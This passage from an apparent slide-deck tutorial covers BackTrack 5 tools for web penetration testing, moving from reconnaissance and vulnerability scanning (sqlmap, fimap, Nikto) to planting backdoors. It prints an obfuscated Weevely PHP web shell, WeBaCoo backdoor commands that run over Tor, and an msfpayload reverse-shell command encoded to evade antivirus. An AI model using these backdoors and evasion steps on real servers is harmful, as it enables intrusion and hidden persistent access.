/pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -b pgp /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 200 -b linkedin • MALTEGO: Maltego is a tool that is based on the application information and forensic and shows how information is connected to each other. With Maltego, we can find relationships that people mostly use today, including your social profile (Facebook - Twitter), mutual friends, businesses that relate to the information gathered, and websites. If we collect information regarding any infrastructure, we can gather relationship between domains and DNS names. Location: Applications - Backtrack - Information Gathering - Network Analysis - DNS Analysis – Maltego
  • 8. 3. CMS IDENTIFICATION • BLINDELEPHANT: BlindElephant is a python based tool that is used for Web Application Fingerprinting. The tool is quick, has low bandwidth and is highly automated. Use /pentest/web/blindelephant/src/blindelephant# ./BlindElephant.py http://sitio-web.com/ cms • CMS-EXPLORER: Fingerprinting serves for web applications, can also be used to identify the type of CMS used, therefore, the attack is done according to the obtained information. Use: /pentest/enumeration/web/cms-explorer# ./cms-explorer.pl -url http://sitio-web.com/ -type cms
  • 9. WHATWEB: It is another tool used to identify the type of content management systems (CMS), blogging platform, statistics, and servers used Javascript libraries.Has 900 Plugins for web analytics purposes. Use: /pentest/enumeration/web/whatweb# ./whatweb http://sitio-web.com/ /pentest/enumeration/web/whatweb# ./whatweb -v http://sitio-web.com/ /pentest/enumeration/web/whatweb# ./whatweb -a 3 http://sitio-web.com/ /pentest/enumeration/web/whatweb# ./whatweb 192.168.1.1/24 4. IDS/IPS DETECTION During the realization of a VA / PT in a domain, the possibility exists that the IDS-IPS services are installed, this can sometimes stop several types of attacks that are made in the domain. A lot of WAF (Web Application Firewall) are sold to companies as a successful technique for mitigating vulnerabilities in Web applications. Luckily, WAF is easy to detect, because most of these use signature-based detection methods, therefore, the attacker can try to encode parameters and try bypassear attack the WAF. In the BackTrack suite includes a useful tool for the detection of IDS-IPS, which is Waffit. • WAFFIT: It is a tool that detects possible Firewall you may have a web server, it is of little use, since detecting the firewall behind the domain is a very important step in the process of penetration testing. Use: /pentest/web/waffit# ./wafw00f.py http://sitio-web.com/
  • 11. 5. OPEN SOURCE ANALYSIS Open-Source Analysis is performed using tools like GHDB, revhosts and XSSed. The GHDB (Google Hack Data Base) and XSSed are linked to websites, while rev hosts is a console tool. • GHDB: Google Hacking Database, the exploit-db team maintains a database for Google Dork's that can greatly help in Pen-tester's information gathering. We can use the dork's to find certain types of vulnerable servers or other information. For example, a Google dork like "Microsoft-IIS/6.0" intitle: index.of "can be used to detect servers running on Microsoft IIS 6.0. • XSSED: http://www.xssed.com/ a website that contains a list of websites vulnerable to Cross Site Scripting (XSS), by various authors. It can be opened from: Applications - Backtrack - Information Gathering - Web Application Analysis - Open Source Analysis - Xssed. 6. WEB CRAWLERS In this last category of Web Analysis, famous Crawlers are used, this will help much to list the files and folders "hidden" inside a web server. The BackTrack suite has many tools to perform this type of analysis such as the DIRB, Golismero, SQLScan, Deblaze and WebShag. • WEBSHAG: Webshag is a tool programmed in Python, which combines the features useful for Auditing Web Servers as web crawling, URL scanning or file fuzzing. Webshag can be used to analyze a web server in HTTP or HTTPS, through a proxy and using HTTP authentication (Basic and Digest).
  • 12. Besides innovative features proposed IDS evasion, intended that the correlation between the application more complicated (for example, using a random sample for each proxy server HTTP request). It can be opened from Applications - BackTrack - Information Gathering - Web Application Analysis - Web Crawlers - WebShag Gui. • DIRBUSTER: DirBuster is a Java application designed to make Brute Force in the directories and files in web server / application. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within it, then try to find these DirBuster. DirBuster is a total of 9 different lists, this makes DirBuster extremely effective in finding hidden files and directories. And if that was not enough DirBuster also has the option of making a pure Brute Force. It can be found at the following location: Applications - BackTrack - Vulnerabylity Assessment - Web Application Assessment - Web Application Fuzzers – DirBuster
  • 14. 7. VULNERABILITY ASSESSMENT AND EXPLOITATION The stage of vulnerability assessment is where you can explore our goal for errors, but before a vulnerability assessment, gathering information about the target is much more useful. The information gathering phase remains the key step before further attacks, simply because it makes the job easier, for example, in the first stage in the use of scanners to identify the CMS as BlindElephant, was scanned and found the version of the installed application. Now, at the stage of vulnerability assessment, you can use many tools (scanners) that will help a lot to find vulnerabilities in respective specific web server. • JOOMSCAN: It is a Perl-based tool that is used to identify known vulnerabilities such as SQL Injection, XSS or other, on web servers based on the Joomla platform. • Detects the version of Joomla! is running. • Scan and locate known vulnerabilities in Joomla! and its extensions. • It reports in text or HTML format. • Allow immediate updating via a scanner or svn. • type Detects vulnerabilities: SQL injection, LFI, RFI, XSS and others. It can be opened from /pentest/web/joomscan# ./joomscan.pl -u www.sitio-web.com • SQLMAP: It is a tool that helps automate the process of detecting and exploiting SQL injection vulnerabilities allowing full access to the database of Web servers. It can be opened from /pentest/database/sqlmap# ./sqlmap.py -u http://www.sitio-web.com/ --dbs
  • 15. FIMAP: It is a small tool programmed in python which can find, prepare, audit and automatically exploiting Remote File Inclusion errors in web applications. Is currently under development, but it is usable. The objective is to improve the quality Fimap and security of your website. It can be opened from /pentest/web/fimap# ./fimap.py -u http://localhost/test.php?file=bang&id=23 /pentest/web/fimap# ./fimap.py -g -q 'noticias.php?id='
  • 16. SHODAN: This is another site evaluation tool, particular utility for pentesters. It can be used to collect a series of intelligent information about devices that are connected to the Internet. We can, for example, look to see if all network devices such as routers, VoIP, printers, cameras, etc., are in place. To find if a service is running in the domain, the syntax would be: • hostname: port target.com: 80,21,22 If we simply want to know the results on the host name, simply, the syntax would be: • hostname: target.com • W3AF: Audit is a tool for web applications security, is basically divided into several modules such as Attack, Audit, Exploit, Discovery, and Brute Force Evasion, which can all be used accordingly. These modules come with several modules w3af side, for example, we can select the module XSS Audit assuming it is necessary to perform a particular audit. It can be opened from Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Vulnerability Scanners - w3af
  • 17. Once the analysis is complete, w3af shows detailed information about the vulnerabilities found in the specified website, which can compromise accordingly for further exploitation.
  • 18. UNISCAN: A Web Vulnerability Scanner, led to computer security, aimed at finding vulnerabilities in web systems. It is licensed under GNU GENERAL PUBLIC LICENSE 3.0 (GPL 3). Uniscan is developed in Perl, has easy handling of regular expressions and is also multi-threaded. Features: • identification system pages via a web crawler. • Proof of pages found through the GET method. • Test the forms found by the POST method. • Support for SSL requests (HTTPS). • Supports Proxy. • Generate list of sites via Google. • Generate list of sites with Bing. • Client GUI written using perl tk. It can be downloaded from the following link: http://uniscan.sourceforge.net/?page_id=7 it can be opened from ./uniscan.pl -u http://www.sitio-web.com/ -qweds • NIKTO: It is a web server scanner which performs comprehensive tests against web servers for multiple items, including over 6500 files / CGIs potentially dangerous controls outdated versions of over 1250
  • 19. servers, and version specific problems on over 270 servers. It also checks the server configuration elements, such as the presence of multiple index files and HTTP server options. Nikto is a robust project that has been several years in development and is constantly evolving. Some of the most interesting features of this tool include the ability to generate reports in various formats, integration with LibWhisker (Anti-IDS), integration with Metasploit, among others. it can be opened from Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Vulnerability Scanners - Nikto Use: /pentest/web/nikto# ./nikto.pl -host www.sitio-web.com 8. MAITAINING ACCESS Once you access the website (goal), we need to maintain access for future use, because we will not be starting from scratch again and again. To avoid this, we can load the shell backdoors's web or the web page. The coding of the tailgate is also important, as not to create "noise" when loaded on the server. If so, then administrators can easily detect and remove the rear doors. In BackTrack 5 R3 suite incorporates good tools to carry out this process, which are: • WEEVELY: It is an essential tool for the further exploitation of web applications, and can be used as a back door or a web shell to manage web accounts. Weevely search functions like system (), passthru (), popen (), exec (), proc_open (), shell_exec (), pcntl_exec (), perl-> system (), python_eval ()) using activated functions in a server remote. The following code is an example of the code of the backdoor created by Weevely. -------------------------------------------------------------------------------------------------------------------
  • 20. eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30=')); ------------------------------------------------------------------------------------------------------------------- It can be opened from Applications - BackTrack - Maintaining Access - Web BackDoors - Weevely Use: /pentest/backdoors/web/weevely# ./weevely.py generate password /root/back.php /pentest/backdoors/web/weevely# ./weevely.py http://www.sitio-web.com/back.php password • WEBACOO: WeBaCoo (Web Backdoor Cookie) is a backdoor that provides a terminal connection over HTTP between client and web server. It is an exploitation tool to maintain access to a web server (hacked). It was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls and Application Firewalls, proving stealth mechanism to execute commands on the compromised server. File obfuscated performs communication via HTTP header's Cookie validating HTTP requests and responses from the web server. WeBaCoo provides a way to generate the code to create the PHP backdoor using predefined payloads. It also offers the "terminal" mode in which the user can establish a remote connection to the server and execute commands with privileges of the web service desired. The download is available from Github: https://github.com/anestisb/WeBaCoo Options: 1) Create obfuscated backdoor 'backdoor.php' with default settings: •. / Webacoo.pl-g-o backdoor.php 2) Create 'raw-backdoor.php' backdoor de-obfuscated using the work "transit": •. / webacoo.pl-g-o raw-backdoor.php-f 4-r 3) Set "terminal" connection to the remote host using the default settings: •. / webacoo.pl-t-u http://127.0. 0.1/backdoor.php 4) Set "terminal" connection to the remote host to configure some arguments: •. / webacoo.pl-t-u-c http://127.0.0.1/backdoor.php "Test-Cookie" - d "TTT"
  • 21. 5) Set "terminal" connection to the remote host via HTTP proxy: •. / webacoo.pl-t-u-p 127.0.0.1:8080 http://10.0.1.13/backdoor.php 6 ) Set "terminal" connection to the remote host via HTTP proxy with basic authentication: •. / webacoo.pl-t-u-p http://10.0.1.13/backdoor.php user: password: 10.0.1.8: 3128 7) Set "terminal" connection to the remote host via Tor and record activity: •. / webacoo.pl-t-u-p http://example.com/backdoor.php tor-l webacoo_log.txt • MSFPAYLOAD: Metasploit can be used to create backdoors that can then be used to maintain access to the web server. This can be done with the help of msfpayload. The steps to create backdoor msfpayload are as follows: We have to select the Payload that we will use to get a Meterpreter shell generated through a reverse TCP connection. The command would be: msfpayload windows/meterpreter/reverse_tcp This Payload has two parameters: lhost (our IP) and LPORT to select the port that we will use. The "R" is used for the output file in RAW data format so that we can then encode. msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R This command will create the payload, but it has to be coded to avoid antivirus detection for that matter can be done using the msfencode option to do this, we need to use pipe ("|") windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode –e x86/shikata_ga_nai –t exe >> bucker.exe -e is used to specify the encoding necessary in this case I'm using the encoding shikata_ga_nai and-t for the type of file extension (exe). For example, if we want to see the list of available encoders MSF, use the following command: msfpayload windows/meterpreter/reverse_tcp -l
  • 22. 9. CONCLUSION These are only a few methods you can follow to make the exploitation of vulnerabilities in a web application. Once we have the information about our goal, try to perform a vulnerability assessment in order to obtain information about the exploits that can be used. Once done, exploit vulnerabilities and, if necessary, load a backdoor, but before that, you must encode the backdoor to avoid detection. I hope this will help you find the vulnerability, exploitation and how to maintain access to your target. My Greeting. References: http://en.wikipedia.org/wiki/Penetration_test http://www.giac.org/certification/web-application-penetration-tester-gwapt http://www.offensive-security.com/information-security-training/penetration-testing-with-backtrack/ https://www.owasp.org/index.php/Web_Application_Penetration_Testing